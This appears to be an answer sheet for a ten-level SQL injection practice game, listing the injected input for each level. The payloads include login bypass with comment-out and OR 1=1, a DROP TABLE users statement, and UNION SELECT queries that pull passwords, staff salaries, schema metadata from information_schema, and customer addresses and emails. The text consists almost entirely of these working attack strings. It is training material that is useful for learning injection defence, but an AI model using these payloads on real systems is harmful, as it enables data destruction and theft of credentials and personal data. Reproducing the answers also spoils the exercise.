Note
The first
'is not part of the injected text, it’s just there for syntax highlighting.
Level 1
'jane';--Level 2
''; DROP TABLE users;--Level 3
'' OR 1=1; --Level 4
'' OR 1=1 LIMIT 1;--Level 5
'' UNION SELECT password, username FROM users;--Level 6
'' UNION
SELECT salary FROM staff
WHERE firstname LIKE '%_reta%'
LIMIT 1 OFFSET 0;--Get table metadata
- Get table names
'' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0;--
- Get columns of table
'' UNION SELECT column_name FROM information_schema.columns WHERE table_name='staff' LIMIT 1 OFFSET 0;--
Level 7
'' UNION
SELECT name, email, salary, employed_since
FROM staff--Level 8
'' UNION
SELECT table_name, table_type, table_rows
FROM information_schema.tables--Level 9
'' UNION
SELECT table_name, column_name, data_type
FROM information_schema.columns
WHERE table_name='customers'--Level 10
product_id=null UNION
SELECT address, name, email
FROM customers
WHERE customer_id=3